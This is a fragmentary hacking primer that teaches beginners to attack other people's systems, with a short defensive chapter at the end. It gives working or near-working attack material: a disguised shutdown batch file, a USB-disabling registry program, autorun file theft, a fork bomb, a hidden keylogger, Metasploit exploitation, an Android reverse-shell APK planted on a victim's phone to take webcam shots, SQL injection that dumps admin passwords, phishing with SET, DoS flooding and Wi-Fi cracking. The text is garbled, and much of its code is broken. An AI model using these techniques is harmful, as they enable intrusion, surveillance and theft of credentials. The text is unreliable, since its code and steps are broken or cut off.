A Hacker's Life Starter - Benjamin James
Acknowledgments
About the Author
Introduction
To who is this book aiming?
How to use the book
Chapter 1 Defining a Hacker
Who are hackers
What motivates hackers
Becoming a hacker
Don't ever go against the rules
computer
Keylogger
How it works
Small summary ahead
Chapter 3 Creating virus
Building your first virus file
Creating a virus to disable USB ports
Setting up Borland C++
Creating the C file that blocks usb ports
Creating virus that unblocks the USB ports.
Virus nested in the stick
administrator password
Chapter 5 In Depth with Backtrack
History of backtrack
Installing backtrack
Metasploit using backtrack
Metasploit Terms
Performing Metasploit to Penetrate Users in LAN
Crack .zip using
Crack Wi-Fi & Windows passwords in
Defending yourself against DoS
Dedication
This book is dedicated to my beloved grandma and mother who taught me to never give up in any circumstances. And for making me the great man that I'm now.
Acknowledgments
To make it clear I would like to give a warm gratitude to
knew everything about network security that gave me enough information. My editor that polished the book for me, without him this book would have not existed at all.
About the Author
Benjamin James has an IT degree and worked as a software developer at a company for years. He has also helped many people with security problems and their computers. He knows how to
Introduction
Awesome for choosing A Hacker's
the information around the world for these past months to put them inside this book. I'm not saying that there is no information out there on the internet or in other books, but what I'm saying is that in this book I won't let you waste your precious time reading, but only gain from it.
Chapter 1 Defining a Hacker
We will cover:
* Who are hackers
* What motivates hackers
* Becoming a hacker
* Don't ever go against the rules
network. Anything that has to do with storing a digital bulk of information. There are two kinds of hackers: white hat (good side) and black hat (bad side). Hackers are advanced programmers who have great knowledge of both hardware and software. In the past, hackers were computer users who wanted to explore the world of computers more in depth. But nowadays "hackers" is the name given to people who crack into someone else's personal system and gain information (criminal hackers); the reasons why could be endless.
Black Hat
A black hat is a person who tries to exploit computers for personal financial gain or other malicious reasons, mostly with bad intentions and to achieve something wrong. They are mostly called crackers.
Becoming a hacker
Chapter 2 The Hackers Tools
We will cover:
* Backtrack
* Wireshark
* Vidalia Tor
* Getting familiar with viruses
* Keylogger
Backtrack
In this book we will use Backtrack as much as we can because it offers a number of methods for cracking into a system with ease. Backtrack is an open source operating system that can be booted from a live CD or USB without requiring installation. Also, permanent installation to the network or HDD is easily achievable. In chapter 5 we will cover BackTrack's
BackTrack's tools are organized into 12 categories:
* Information Gathering
* Vulnerability Assessment
* Exploitation Tools
* Privilege Escalation
* Maintaining Access
* Reverse Engineering
* RFID Tools
* Stress testing
* Forensics
* Reporting Tools
* Services
* Miscellaneous
In Figure 2-1
Wireshark
Wireshark is another tool used to sniff WIFI/online account passwords and packets out there. Basically what it does is capture packets from connections
How it works
Vidalia TOR
Tor is the world's largest anonymity free
How it works
Getting familiar with viruses
Top 5 destructive computer viruses in History
* Melissa
* MYDoom
* Storm
* ILOVEYOU
* Code Red
Keylogger
Knowing how to work with a keylogger is also useful, especially when you will need to monitor users' passwords. Basically key loggers are used in IT organizations to find technical problems. But there are those who use it for sniffing users' passwords and others.
How it works
The word says it for itself: it logs keyboard keystrokes into a file, so it can be found out later. Most key-loggers store the data inside the local hard drive. But there are some that send it through the internet or the network remotely (see Figure 2-4).
hacking.
* Tor cloaks your IP and with that it makes it difficult for them to find the real IP.
* Keylogger is used to monitor what the user is typing on his keyboard.
end you will understand how to make one and how it operates.
1. Start by opening notepad for the texting. Start->All Programs->Accessories->Notepad
2. Type this piece of code in notepad:
@echo off
echo Message here.
shutdown -s -f -t 60 -c "type a message you want to appear here"
3. Save the file as play this 3D game.bat, change the Save file type: when saving to All Files. And then save. (see Figure 3-1)
4.
1. First off you need to download Borland C++ 5.5 or above.
2. After you install the Borland C++ compiler, create two new Text Documents in Notepad.
3. Type these first two lines in the first txt file:
-Ic:\Borland\Bcc55\include
-Lc:\Borland\Bcc55\lib
4. Save changes and close the file. Now rename the first file to bcc32.cfg.
7. Put the two files in this directory:
C:\Borland\BCC55\Bin
#include <stdio.h>
#include <stdlib.h>   /* system() is declared here */
int main(void)
{
    /* sets the service Start value to 4 (disabled); the key path is cut off in the source text */
    system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\Cur /v Start /t REG_DWORD /d 4 /f");
    return 0;
}
2. Place the file in C:\Borland\BCC55\Bin
3. Now open command prompt (Start->Run->type cmd)
4. Type in:
cd C:\Borland\BCC55\Bin
5. Now compile the file by typing:
bcc32 block_usb.c
Creating virus that unblocks the USB ports.
Now that you're done you should have a block_usb.exe file in the folder that hopefully blocks all the USB ports.
1. To enable all the USB ports back again you should replace the code in the block_usb.c file with this and compile again:
#include <stdio.h>
#include <stdlib.h>   /* system() is declared here */
int main(void)
{
    /* sets the service Start value back to 3 (manual start); the key path is cut off in the source text */
    system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\Cu /v Start /t REG_DWORD /d 3 /f");
    return 0;
}
3. Ok that's it, save the file with a .inf extension
4. Choose an appealing icon for the file and that's it.
5. Create another text file and in it type this:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\backup\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\ backup \Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\ backup \vids"
@echo off
cls
6. When you're done save it as something but give it the extension .bat
7. We are almost done. Open another empty text file and type this:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
12. Now it should be done. Pull out the stick from the computer and insert it again and the autoplay window should
Getting started with Trojan
* Delete Data
* Blocking Data
* Modifying Data
* Copying Data
* Disrupting the performance of computers or computer networks
Trojan backdoor
it in virtual box.
2. Make sure you don't have an antivirus in the virtual box operating system. Now your antivirus should detect this bat file. If not this could fill the user's memory.
@echo off
A
Start
Start
Start
Start
Start
Start
Start
goto a
Chapter 4 Cracking passwords
We will cover:
* Types of passwords
* Basic administrator password reset.
* Crack the encrypted pdf
* Bypass windows password
* Custom made keylogger
Types of passwords
Dictionary - A file of words is run against user accounts, and if the password is a simple word, it can be found pretty quickly.
Hybrid - A common method utilized by users to change passwords is to add a number or symbol to the end. A hybrid attack works like a dictionary attack, but adds simple numbers or symbols to the password attempt.
Brute force - The most time-consuming, but comprehensive way to crack a password. Every combination of characters is tried until the password is broken.
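The three attack classes above map directly onto a password-policy check a defender can run before a password is accepted. The following is an added example, not code from the book: it classifies a candidate password by which attack would recover it first (dictionary, hybrid with a trailing number/symbol suffix, or brute force only) and computes the worst-case brute-force keyspace. The wordlist is a constructed stand-in for a real dictionary file, and the function names are my own.

```python
import re
import string

# Constructed mini wordlist standing in for the dictionary file the attack uses
# (a real check would load a large list; this set is only for illustration).
WORDLIST = {"password", "letmein", "dragon", "monkey", "qwerty", "welcome"}

# The hybrid attack described above appends "simple numbers or symbols to the
# end" of a dictionary word, so only a trailing non-letter suffix is stripped.
_TRAILING_SUFFIX = re.compile(r"[^A-Za-z]+$")


def classify_password(pw, wordlist=WORDLIST):
    """Return which attack class would recover pw first.

    'dictionary'  - pw is a plain wordlist entry (case-insensitive)
    'hybrid'      - pw is a wordlist entry plus a numeric/symbol suffix
    'brute-force' - neither; only exhaustive search is left
    """
    if pw.lower() in wordlist:
        return "dictionary"
    stem = _TRAILING_SUFFIX.sub("", pw)
    if stem != pw and stem.lower() in wordlist:
        return "hybrid"
    return "brute-force"


def charset_size(pw):
    """Size of the smallest standard alphabet that covers every character of pw."""
    size = 0
    if any(c in string.ascii_lowercase for c in pw):
        size += 26
    if any(c in string.ascii_uppercase for c in pw):
        size += 26
    if any(c in string.digits for c in pw):
        size += 10
    if any(c in string.punctuation for c in pw):
        size += len(string.punctuation)  # 32 printable ASCII symbols
    return size


def brute_force_keyspace(pw):
    """Candidates an exhaustive search over pw's alphabet and length must cover."""
    if not pw:
        return 1
    return charset_size(pw) ** len(pw)


def seconds_to_exhaust(pw, guesses_per_second):
    """Worst-case wall-clock time for a brute-force run at the given guess rate."""
    return brute_force_keyspace(pw) / guesses_per_second


def audit(pw, guesses_per_second=1_000_000):
    """Summary a policy check could log for a candidate password."""
    return {
        "class": classify_password(pw),
        "keyspace": brute_force_keyspace(pw),
        "seconds_to_exhaust": seconds_to_exhaust(pw, guesses_per_second),
    }


if __name__ == "__main__":
    for candidate in ("password", "Dragon2024!", "xK9#pL2q"):
        print(candidate, audit(candidate))
```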
Basic administrator password reset
1. Go to Start->open Run-> then write cmd. Or Start->And search for command prompt then enter.
2. To view the available users inside the operating system (see Figure 4-1) type in:
net user
3. Now type:
net user Administrator *
If you write net user again, the administrator account this time is Administrator.
4. After that type in the new password twice. After that it should be okay for you to enter the administrator account with the new password.
1. When you download and install APDF Restrictions Remover, you should be able to right click the restricted pdf file and choose Remove Restrictions or Remove Restriction & Save as..
Bypass windows Password
1. Go to this link: http://ophcrack.sourceforge.net/download.p and download ophcrack LiveCD-> Burn the iso.
2.
4. Now launch the IDLE (Python GUI) by searching the name in start and the python shell will launch itself.
5. Type this python code inside the app:
import win32api
import win32console
import win32gui
import pythoncom, pyHook
win
win32console.GetConsoleWindow()
win32gui.ShowWindows(win,0)
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii != 0 or 8:
f=open(c:\output.txt,w)
buffer=f.read()
f.close()
f=open(c:\output.txt,w)
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs=/n
buffer += keylogs
f.write(buffer)
f.close()
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
6. Save the file as my_own_keylogger.py and launch it
7. Now that your home-made software is running, you can start testing it by going to
History of backtrack
Backtrack originated from two
Installing backtrack
Backtrack is an operating system that can either be run from a Live CD or it
startx
4. And hit Enter. To open the graphical user interface operating system.
7. Fill in the bit login:
Root
8. Fill in the password:
toor
9. And to start backtrack to the desktop write:
startx
Metasploit using backtrack
Metasploit Terms
Vulnerability Information Disclosure (A weakness inside the system)
Performing Metasploit to Penetrate Users in LAN
/pentest/exploits/framework3
cd /pentest/exploits/framework2.
2. Once you're inside that directory you type in:
svn update
3. Figure 5-3 shows you the Armitage dialog ready to start connecting
4. Once it is open change the DB Driver option to postgresql. Leave the DB Connect String the same
5. Now go to Host->Nmap Scan->Quick Scan (OS detect). Here you can scan or import hosts in your network using Nmap. (see Figure 5-5)
6. Enter the IP range you think that the user might be in, for example from 30 to 40. And Ok.
7. When it's finished a message will come up saying Scan is complete. Click Ok.
8. And then you will see all the available host computers here. You can organize them by right clicking the gray area and Layout->Stack.
9. Now go to: Attacks->Find Attacks->by port
Attack->smb->ms08_067_netapi
12. To take a screenshot of the host computer, right click on the icon and: Meterpreter 1->Explore->Screenshot. And there you have it.
13. And to explore inside the victim's computer: Meterpreter 1->Explore->Browse Files.
2. To make sure you have gedit (gedit is a text editor) installed on your backtrack, type in:
gedit
(If it's not installed type in: apt-get install gedit)
3. Once gedit is open save it as an empty file named passwd.list inside the
4. Type in:
dhclient eth0
password.
6. If you would like to test if it works, type in terminal: firefox . That will launch firefox.
7. In the url navigator type in:
http://[your_router_ip]/
Fill in the username and password you found and Hualaa! You're in. (see Figure 5-6)
desktop.
1.
to
-2 modulo r/m
Here is how the chart works:
-b > bruteforce
-c a > charset lower case alphabets
-l 1-6 > length of expected password
fcrackzip -b -c a -l 1-6 "/root/Desktop/crack me.zip"
1. Run Backtrack to the Desktop and run the terminal.
2. Type in:
gedit
3. And type this in gedit and when you're finished save as hacker
#!/bin/bash
Backtrack was revolutionized to Kali
Backtrack 6 was never going to come out and have new features. But apparently the same coders and people who created backtrack re-created backtrack with new features and named it Kali. Still many people gave it many other names like: Backtrack six, Reborn of
Key features
Everything is the same as backtrack so it will be very easy for you to get used to it. The only difference is that it has more tools and features like:
* Kali now supports many more chipsets for wireless devices compared to backtrack 5.
Hack in Smartphones
msfpayload
android/meterpreter/reverse_tcp
lhost=192.168.2.17 lport= 8080 R >
/root/Desktop/files.apk
msfconsole
exploit
5. Ok now we are ready. Now you'll have to figure out a way to have the victim download file.apk to his/her phone or tablet. Just find a free web host or share it in your dropbox. I'll just leave it to your imagination.
6. Now once it's downloaded and opened on the phone you can start playing in his/her phone. We will first list the files in the phone by typing:
ls
ps
8. And now let's take some pictures from the cam by typing:
webcam_snap 1
Figure 5-8 shows you how the script is running in the terminal.
Chapter 6 Website Hacking
We will cover:
History of SQL injection
Understanding SQL injection
Simple SQL-injection
Introduction to Phishing
Performing Phishing
Sometimes
Understanding SQL-injection
Simple SQL-injection
SQL injection can be used in contact forms, feedback fields, shopping carts and many more. Most of the fields allow for SQL commands. But nowadays it's really difficult to do an SQL injection on some sites because most of them come really tightly protected from SQL-injection.
Doing a SQL-injection
2.
http://www.testing_site.com/index.php?id=2'
http://www.testing_site.com/index.php?id=2 order by 1
http://www.testing_site.com/index.php?id=2 order by 2
http://www.testing_site.com/index.php?id=2 order by 3
http://www.testing_site.com/index.php?id=2 order by 4
http://www.testing_site.com/index.php?id=2 order by 1--
http://www.testing_site.com/index.php?id=2 order by 2--
http://www.testing_site.com/index.php?id=2 order by 3--
http://www.testing_site.com/index.php?id=2 order by 4--
http://www.testing_site.com/index.php?id=2 order by 5--
http://www.testing_site.com/index.php?id=-2 union select 1,2,3,4,5,6,7
http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7
This should display the version at 5.0.1 or 4.3
http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7
If nothing happens or it went wrong try this one:
http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7
10. Now with this it will show you a list of table names. It's up to you to find the table name which is related with the user or admin.
11. Now you need to replace the group_concat(table_name) with group_concat(column_name)
12. Also replace "from information_schema.tables table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--"
13. It would be great if you could install the HackBar addon right now (see Figure 6-1)
14. We go to sql->Mysql->MysqlChar() inside the hackbar.
http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)
15. Now you are supposed to see the list of columns.
For example:
example: admin,password,admin_id,admin s,admin_id,admin_name,admin_password,I
16. And next, replace the group_concat(column_name) with group_concat(columnname1,0x3a,anotherco
17. Now replace the "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name"
For example:
http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_p from admin
18. It's supposed to show the data stored in the database. It depends on the column name. If all of these queries give an error message then try some other column names from the list.
19. Now it's time to try one of these url links for finding the admin url link.
http://www.testing_site.com/admin.php
http://www.testing_site.com/admin/
http://www.testing_site.com/admin.html
http://www.testing_site.com:2082/
After that, with a few tries and failures, you will wind up inside the administrator page using these url examples.
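Seen from the defending side, the whole walkthrough above works only because the id= value is pasted into the SQL text. The following is an added example, not code from the book: a constructed sqlite3 database stands in for the vulnerable index.php?id= page, the flawed query is shown next to its validated and parameterized replacement, and a small filter flags the probing pattern (quote, order by N, union select, information_schema, comment terminator) in request logs. Assumptions: the function names are my own, sqlite_version() stands in for MySQL's version(), and the payloads use three columns because the constructed posts table has three.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the site's database: a posts table behind
    index.php?id=N and an admin table like the one the walkthrough targets."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (admin_id INTEGER, admin_name TEXT, admin_password TEXT);
        INSERT INTO posts VALUES (2, 'Hello', 'first post');
        INSERT INTO admin VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return conn


def lookup_vulnerable(conn, raw_id):
    """The flawed pattern: the id= parameter becomes part of the SQL text,
    so a 'union select' in it is executed as SQL."""
    sql = "SELECT id, title, body FROM posts WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def is_valid_id(raw_id):
    """Server-side allow-list: the parameter must be a plain decimal integer."""
    return re.fullmatch(r"\d+", raw_id.strip()) is not None


def lookup_safe(conn, raw_id):
    """Hardened form: validate first, then bind the value with a placeholder so
    it is always data and never SQL."""
    if not is_valid_id(raw_id):
        return []  # a real handler would answer HTTP 400 here
    return conn.execute(
        "SELECT id, title, body FROM posts WHERE id = ?", (int(raw_id),)
    ).fetchall()


# Detection: the probing sequence above leaves a recognisable trail in access logs.
_PROBE = re.compile(
    r"('|\border\s+by\s+\d+|\bunion\s+(all\s+)?select\b|information_schema|--)",
    re.IGNORECASE,
)


def looks_like_injection(raw_id):
    """True when an id= value carries one of the walkthrough's probe markers."""
    return _PROBE.search(raw_id) is not None


if __name__ == "__main__":
    db = make_db()
    payload = "-2 union select admin_id, admin_name, admin_password from admin"
    print("vulnerable:", lookup_vulnerable(db, payload))  # leaks the admin row
    print("safe:      ", lookup_safe(db, payload))        # empty, input rejected
    print("flagged:   ", looks_like_injection(payload))   # True
```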
Introduction to Phishing
Whaling
This type of phishing is specifically directed at high ranking persons inside the business or the organization.
Spear phishing
This one is focused on any people who have some connection with the organization
Performing Phishing
2. Search for the code line inside the source code
3. Make some changes inside the code
4. Create a free hosting account. Most of the time your account gets suspended because it's against the rules to have a phishing site online
5. Upload the fake Login Page you created on the hosting site.
Phishing:
1. First run Backtrack to the desktop and run the terminal.
2. To read your ip address type:
ifconfig
cd /pentest/exploits/set
./set
5. Select 1 for Social-Engineering Attacks
6. Now we choose 2 to select the Website Attack Vectors.
7. We now select 4 for Tabnabbing Attack Method.
10. In this step you will have to enter the name of the site you want to make a phishing page of. It could again be ANY social network site or email site, for example:
http://www.ffthesocialnetwork_or_emailsi
11. After a few moments of waiting it asks to press Return, so do it; afterwards press Enter (see Figure 6-3)
12. Now what actually happened is that your ip address has turned into your phishing page link.
13. The next step is to make your IP shorter; to do so we go to http://goo.gl/ and paste our link and click on Shorten Url. (see Figure 6-4)
14. And there you have it, test the link to see if it works. Now you need to either email the link or message the link to a friend that can handle this prank, or to yourself for educational purposes.
15. Now when the ID and the Password are entered you'll receive the email and password in your terminal. (So leave the terminal open and don't restart the PC until it's in, otherwise the ip might change).
Dear Customer
Dear Customer
Chapter 7 Denial of Service in Depth
We will cover:
* What is Denial of Service
* How DoS works
* Building a DoS attack
* DoS on the DNS
Have
A lot of people might be thinking that DDoS is about cracking the security or changing private information. For example, an Email Denial of Service attack is not about hacking the user's email but about preventing him from checking, receiving or sending the mails. It works, as you might probably already have guessed, by sending mass and mass of requests continuously. And with this the service/server becomes either slow or crashes. What's happening really is
Limitations of DoS
In these days the services are really
Sometimes even when the DDoS manages to put the service/server down, it goes back up after a few moments. Another one: if you only have one attacker attacking a website and that website has so much traffic on it, it would be almost impossible because
* Web servers
* Email servers
* DNS servers
Also connections that don't have a limit. To find out that it has no limit send packages to see how much it can hold. Send a lot of email attachments into their system. And, let's say you don't have a specific target, you can just flood it like we would do, but it takes more flooding and more connections to do it.
5. Also change the method field to TCP. And click on IMMA CHARGIN MAH LAZER to mount the attack; quickly the Requested counter will start increasing fast.
DoS On a DNS
5. Don't close the command prompts and leave them working for an hour or even more (the bigger the site the more time it takes). While the command prompts are running keep refreshing the site to see if it's still up and eventually after a few moments it will be down.
A tip to make sure the site goes down, and faster, is to do this trick of opening many command prompts on multiple computers. The more computers you have the better.
We will cover:
* How security wifi is encrypted
* Tools to crack a wifi
* Cracking WEP wireless password
* Cracking WPA/WPA2 wireless password
* Cracking wifi password in windows
* Bypassing MAC Address filter
How security wifi is encrypted
The tools
* Backtrack
* Airmon-ng
* Commview
* Compatible wifi card
1. First run backtrack to desktop and open the terminal.
2. To get a list of the network interfaces type in (see Figure 8-1):
airmon-ng
type:
airmon-ng start wlan0
5. Now to find the networks in the area and pick one we will be using airodump-ng (interface). So I type:
airodump-ng mon0
6.
aireplay-ng
-2
p
FF:FF:FF:FF:FF:FF
00:05:5D:EC:AA:52 mon0
0841
c
b
Aircrack-ng wep*.cap
Cracking WPA/WPA2 Wireless Pass
1. Open backtrack to the desktop and run two terminals
2.
airmon-ng
And the interface will come up.
3. So type in:
apt-get update
6. And now we install reaver by typing:
1. First download the commview free trial version at http://www.tamos.com/download/main/ca. It can also be bought from the site itself. This is a tool for monitoring wireless.
2. Once it's done, launch commview (see Figure 8-5) and go in the note Tab
9. Now we go to www.aircrackng.org/install.html and click on Precompiled and from there download Aircrack-ng GUI.exe (see Figure 8-8)
Now type:
4. Now we will search some packets from the wifi. We will use airodump-ng c [channel] a --bssid [bssid] mon0. That means I would type:
airodump-ng c 9 a --bssid 98:FC:11:69:E6:07 mon0
5. Now we wait for the terminal to work until we get some packets under the STATION (see Figure 8-11)
6. Once you found the mac address under the station copy it. Mine is 00:12:3E:78:3F:7F
7. Now we are taking the interface down by typing:
Ifconfig wlan0 up
00:12:3E:78:3F:7F
8. Now launch the wireless manager by going start->internet->Wicd Network Manager
9. Disconnect all, give it a refresh and connect to the wifi whose filter you bypassed and it should work
Sometimes if you bypass the mac filter you might lose the internet. It might be because they found out that you spoofed inside the network and they kicked you out.
the strongest
Chapter 9 Defending from Hackers
We will cover:
* Protect yourself against DoS attacks
* Best tool to remove the virus
* Securing your operating system
* Securing your wireless
* HideMyAss
1. Go to malwarebytes.org/downloads/ and download it for free (see Figure 9-2)
4. Once you installed it, launch it. Choose Perform Quick Scan and then click Scan. To test the software's power: maybe before you even click on scan, Malwarebytes has already started to quarantine a few malicious threats.
3. Another great tool to completely protect yourself is the use of avast SafeZone. First download or buy the full version of Avast. And when you have installed it go to the SECURITY TAB->Tools Section->SafeZone and click on Switch to SafeZone (see Figure 9-5)
Ipconfig /all
2. From there locate the line that is labeled Gateway
3. Paste that Gateway IP in your favorite web browser address bar.
4. If you're using the Linksys go in the wireless security tab and change the Security Mode to WPA or WPA2
5. Also disable the